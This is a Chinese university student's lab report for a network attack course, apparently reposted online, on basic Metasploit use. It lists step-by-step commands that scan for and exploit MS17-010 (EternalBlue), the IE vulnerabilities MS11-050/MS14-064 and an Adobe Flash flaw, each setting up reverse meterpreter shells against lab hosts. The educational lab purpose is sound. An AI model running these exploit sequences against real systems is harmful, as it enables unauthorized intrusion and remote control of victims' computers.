1. 程式人生 > >2018-2019-2 20165313 《網絡對抗技術》 Exp5:MSF基礎應用

2018-2019-2 20165313 《網絡對抗技術》 Exp5:MSF基礎應用

耐心 內容 類型 sca 可能 依次 同時 flash 文件

實踐要求與問題回答

1. 實踐內容(3.5分)

本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.1一個主動攻擊實踐,如ms08_067; (1分)
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)
1.3 一個針對客戶端的攻擊,如Adobe;(1分)
1.4 成功應用任何一個輔助模塊。(0.5分)
以上四個小實踐可不限於以上示例,並要求至少有一個是和其他所有同學不一樣的,否則扣除0.5分

問題回答

用自己的話解釋什麽是 exploit , payload , encode.

exploit: 設相當於利用漏洞打開的通道,將做好的木馬病毒等順利傳輸到靶機。

payload: 簡單來說就是病毒代碼包裝成一個可執行的文件(任意指定類型),然後通過通道傳輸為獲取靶機權限做準備。
encode: 針對payload進行編碼,改變payload代碼特征(例如不出現“0x00”的特殊機器碼等),但是不改變payload為我們所用的特征,能對payload進行加工。

實踐過程

本次實踐所用的輔助功能及漏洞:nmap掃描,auxiliary輔助模塊,MS17-010安全漏洞,MS11-050/MS14-064,abode_flash_avm2

一、Windows服務滲透攻擊——MS17-010安全漏洞

(1)打開MSF輸入nmap -O -Pn 192.168.239.129

技術分享圖片

(2)利用auxiliary輔助模塊進行掃描:

msf > use auxiliary/scanner/smb/smb_ms17_010       
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129    
msf auxiliary(scanner/smb/smb_ms17_010) > run       

(3)根據要求設置並攻擊:

輸入back退回,然後依次輸入:

 use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp 
set LHOST 192.168.239.131
set RHOST 192.168.239.129
exploit

技術分享圖片

二、瀏覽器滲透攻擊——MS11-050/MS14-064

(1)

打開MSF,依次輸入:

use windows/browser/ms11_050_mshtml_cobjectelement
set payloadwindows/meterpreter/reverse_http
set LHOST 192.168.239.131
set LPORT 5313
exploit

技術分享圖片
在靶機上打開生成的URL,發現報錯,猜測可能是漏洞和IE版本問題
技術分享圖片

(2)重新選擇:

主要步驟和(1)中大致相同,就是修改一下調用的名稱。註意:需要添加的指令AllowPowershellprompt---true並將http鏈接改成tcp鏈接
技術分享圖片

生成URL並開啟監聽服務:
技術分享圖片

靶機打開IE瀏覽器,輸入網址:
技術分享圖片

攻擊機回連成功,輸入sessions -i獲取對話:
技術分享圖片

三、針對Adobe Reader軟件的滲透攻擊——abode_flash_avm2

(1)生成PDF文件沒有成功(上一屆學長學姐的經驗並不好用)

(2)利用abode_flash_avm2攻擊:

(1)輸入search abode
技術分享圖片

(2)根據要求進行配置:

use exploit/windows/browser/abode_flash_avm2
set srvhost 192.168.239.131
set lhost 192.168.239.131
set payloadwindows/meterpreter/reverse_tcp

(3)在靶機裏下載adobe_flash_11。

(4)輸入exploit:技術分享圖片

(5)在靶機裏登錄生成出來的地址:
技術分享圖片
技術分享圖片

(6)獲取權限:
技術分享圖片

技術分享圖片

實踐總結及體會

本次試驗在我看來為漏洞尋找合適的靶機是一件很費時間的事情,需要足夠的耐心,第二就是如何正確利用MSF的輔助功能為攻擊做好鋪墊,仍然需要大量反復的實踐,不然所掌握的東西僅僅知識一點點皮毛而已。同時我發現想要利用一個漏洞進行攻擊也不是一件容易的事情,因為一個漏洞不可能對所有情況都適用,所以攻擊方不僅僅是要找合適的漏洞,也要為漏洞找合適的機器或程序。矛和盾的較量看來還要持續很久很久。

2018-2019-2 20165313 《網絡對抗技術》 Exp5:MSF基礎應用